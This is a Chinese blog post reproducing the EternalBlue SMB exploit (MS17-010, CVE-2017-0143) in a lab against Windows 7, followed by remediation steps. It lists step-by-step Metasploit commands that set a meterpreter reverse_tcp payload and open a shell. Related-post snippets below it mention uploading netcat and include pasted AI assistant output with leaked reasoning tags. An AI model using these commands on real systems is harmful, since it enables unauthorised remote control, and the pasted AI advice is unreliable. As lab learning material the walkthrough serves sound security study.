CVE-2017-0143

已于 2023-03-13 11:50:24 修改
阅读量919 收藏 3
点赞数
文章标签: windows 网络 linux
于 2023-03-13 11:18:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52084568/article/details/129485969
版权

CVE-2017-0143-远程溢出漏洞(永恒之蓝 MS17-010)

漏洞描述
漏洞出现在 Windows SMB v1 的内核态函数 srv!SrvOs2FeaListToNt 处理 FEA(File Extended Attributes) 转换时,在 Large Non-Paged Kernel Pool 上存在缓冲区溢出
函数 srv!SrvOs2FeaListToNt 将 FEA list 转换成 NTFEA(Windows NT FEA) list 前调用 srv!SrvOs2FeaListSizeToNt 计算转换后的 FEA lsit 大小,计算大小错误,而导致缓冲区溢出。
方程式组织在漏洞利用框架中针对 SMB 服务进行攻击的漏洞,该漏洞导致目标系统上执行任意代码

复现

靶机:	Windows 7
攻击机:	Kali

使用 nmap 扫描靶机 存在 445 端口开放 使用 msf 进行攻击试探
在这里插入图片描述

search ms17_010
# 搜索 msf ms17 模块
use 3
# 使用第三个 payload 对靶机进行漏洞扫描监测

在这里插入图片描述

set RHOST 172.16.75.130
# 设置目标 IP 执行操作

在这里插入图片描述

run / exploit
# 可使用其中一个进行执行操作

通过执行后 显示可能存在漏洞

在这里插入图片描述

更换攻击模块 进行攻击
use 0

在这里插入图片描述

set RHOST 172.16.75.130
# 设置靶机地址
set payload windows/x64/meterpreter/reverse_tcp
# 设置攻击 payload
run
# 执行攻击操作

在这里插入图片描述

攻击成功 
shell
# 进入命令行
systeminfo
# 查看靶机系统信息

在这里插入图片描述

修复

https://learn.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

# 官方修复地址 选择对应操作系统进行安装

在这里插入图片描述

添加系统入站规则;关闭 445、135、138、139 等端口

在这里插入图片描述

【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
李火火的安全圈
03-07 9061
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
Windows - SMB 远程代码执行漏洞(永恒之蓝) - CVE-2017-0146 & MS17-010
最新发布
Blue17 の 小窝
03-22 1201
永恒之蓝漏洞(MS 17-010、
kali+win2008系统扫描+CVE-2017-0143漏洞利用
weixin_46709219的博客
11-24 1830
一)概念讲解  1)系统安全漏洞: 系统安全漏洞指Windows操作系统以及应用软件设计中存在的缺陷。按照威胁类型对安全漏洞进行初步分类:     I)获取控制权:利用该类型漏洞可以获取目标操作系统的管理权限,威胁最大,可影响系统的机密性完整性; 例如:1)MS17_010也称“永恒之蓝”,是在Windows的SMB服务处理SMBv1请求 时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码; 2)这个漏洞被多款恶意软件所利用,如勒索病毒WannaCrypt;     I
永恒之蓝_CVE-2017-0143_漏洞复现/验证
1,2,3
03-06 1957
永恒之蓝CVE-2017-0143,漏洞验证/复现
渗透测试+MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148(永恒之蓝)漏洞复现
lovingMeng的博客
03-16 763
通过kali对windows系统进行渗透测试
CVE-2017-0143(远程溢出)漏洞复现
Ch_an_ger的博客
06-19 7027
一、漏洞原理 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算
CVE-2017-0143永恒之蓝复现
Welcome To Myon'Blog !
12-22 651
CVE-2017-0143永恒之蓝复现 漏洞复现 永恒之蓝 win7漏洞 kali渗透
网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
末班车的博客
03-10 1443
MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大小错误,而导致缓冲区溢出。
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB...
MS17-010远程溢出(CVE-2017-0143
p_utao的博客
09-03 2341
漏洞介绍 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool)上存在缓冲区溢出。 函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用。srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小,因计算大
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
weblogic 补丁 反序列化补丁 。己已经打上补丁了。欢迎下载
poc--exp:常用渗透poc收集
03-20
poc--exp 个人常用渗透poc收集 CVE-2014-4113 Win64bit本地提权漏洞 CVE-2014-4878海康RCE突破 CVE-2017-0143永恒之蓝突破 CVE-2017-0474安卓媒体服务器RCE CVE-2017-0641 Google Android Media框架远程代码执行漏洞 CVE-2017-11882办公室远程执行突破 CVE-2017-13156安卓janus漏洞 CVE-2017-5753英特尔侧信道攻击扩展 CVE-2017-7269 IIS6.0远程代码执行入侵复现 CVE-2018-15982 Flash突破 CVE-2018-19518 PHP imap_open函数任意命令执行漏洞 CVE-2018-20250 WinRAR目录穿越突破 CVE-2018-4407 IOS重叠重叠 CVE-2018-4878 Flash突破 CV
MS17-010/CVE-2017-0143永恒之蓝 漏洞复现
weixin_62689079的博客
11-30 2693
MS17-010/CVE-2017-0143永恒之蓝 漏洞复现及漏洞利用
域内提权之CVE-2021-42278漏洞复现
一只爱吃橙子的羊
11-21 1821
域内提权CVE-2021-42278漏洞复现,本文仅为验证漏洞,在本地环境测试验证,无其它目的。
MS17_010永恒之蓝(仅供参考不可实践)
m0_62207482的博客
12-05 809
漏洞为外界所知源于勒索病毒的爆发,该病毒利用NSA(美国国家安全局)泄露的网络攻击工具 永恒之蓝( EternalBlue )改造而成,漏洞通过TCP的445和139端口,利用SMB远程代码执行漏洞,攻击者可以在目标系统上执行任意代码。meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 //上传nc到目标主机。metepreter>ps -S "csrss" (搜索csrss.exe进程,获取进程号)
Win7 Server 漏洞修复(CVE-2017-**、CVE-2018-**、CVE-2019-**、CVE-2012-**)
.
06-30 5720
【详解--操作 Win7 Server 漏洞修复(CVE-2017-**(MS17-010)、CVE-2018-**、CVE-2019-**、CVE-2012-**)
MS17_010 漏洞利用与安全加固
theRavensea
03-18 2606
MS17_010 漏洞后门利用程序 EternalBlue(从目前使用情况来看,相对比较稳定)可影响 Windows 7和 Windows Server 2008 大部分版本的操作系统,无需认证权限就能实现系统入侵控制;插件工具DoublePulsar 可以远程向目标控制系统注入恶意DLL 或 Payload程序。综合利用这两个工具,入侵成功之后可以对目标系统执行 Empire/Meterpreter 反弹连接控制。在此过程,还需要NSA 使用的类似 Metasploit 的漏洞利用代码攻击框架 FuzzB
CVE-2017-8046修复建议
03-12
<think>好的,我现在需要处理用户关于CVE-2017-8046漏洞修复建议的查询。首先,我要确认这个漏洞的基本信息。根据记忆,CVE-2017-8046是Spring Data REST的一个远程代码执行漏洞,影响特定的版本。接下来,我需要验证这些信息是否正确。 用户提供的引用中并没有直接提到CVE-2017-8046,但引用[4]提到了Tomcat的CVE-2017-12617,这说明用户可能对2017年的漏洞感兴趣。不过,我需要确保提供的信息准确,因此可能需要依赖已知的知识库。根据以往的经验,CVE-2017-8046涉及Spring Data REST在PATCH请求中处理不当,导致表达式注入攻击。 接下来,修复建议通常包括升级到修复版本。例如,Spring Data REST的版本需要升级到Kay RC2、Ingalls SR9或更高版本。此外,用户可能需要检查项目中的依赖,更新pom.xml或Gradle文件,并重新构建部署。如果无法立即升级,临时措施可能包括禁用PATCH方法或实施输入验证。 然后,需要确认补丁链接。通常,Spring的官方安全公告会提供详细信息,比如链接到Spring官方博客或GitHub的提交记录。例如,Spring的公告可能位于https://spring.io/blog/2017/10/11/cve-2017-8046-remote-code-execution-vulnerability-in-spring-data-rest。 最后,生成相关问题需要考虑用户可能的后续疑问,比如漏洞影响范围、检测方法、其他相关漏洞等。确保回答结构清晰,引用正确来源,并符合用户要求的格式,比如使用中文、正确的LaTeX格式,以及添加引用标识。</think>[系统级指令响应] ### CVE-2017-8046漏洞修复方案 CVE-2017-8046是Spring Data REST中的一个远程代码执行漏洞,攻击者可通过恶意构造的PATCH请求实现表达式注入。以下是修复建议: 1. **升级至安全版本** - Spring Data REST需升级到以下修复版本: $$ \text{Kay RC2(Spring Boot 2.0.0.M5+)} $$ $$ \text{Ingalls SR9(Spring Boot 1.5.9+)} $$ 通过Maven或Gradle更新依赖,例如Maven中修改`pom.xml`: ```xml <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-data-rest</artifactId> <version>2.0.0.M5</version> </dependency> ``` 更新后需重新编译部署[^1]。 2. **临时缓解措施** - 禁用PATCH请求:在应用配置中限制HTTP PATCH方法的使用。 - 输入过滤:对请求中的`path`参数进行严格校验,避免非法字符注入[^4]。 3. **补丁与官方公告** - 官方修复补丁地址:https://github.com/spring-projects/spring-data-rest/commit/aa7e6eb - 安全公告参考:https://spring.io/blog/2017/10/11/cve-2017-8046-remote-code-execution-vulnerability-in-spring-data-rest [^1][^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

暴龙振翅飞翔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值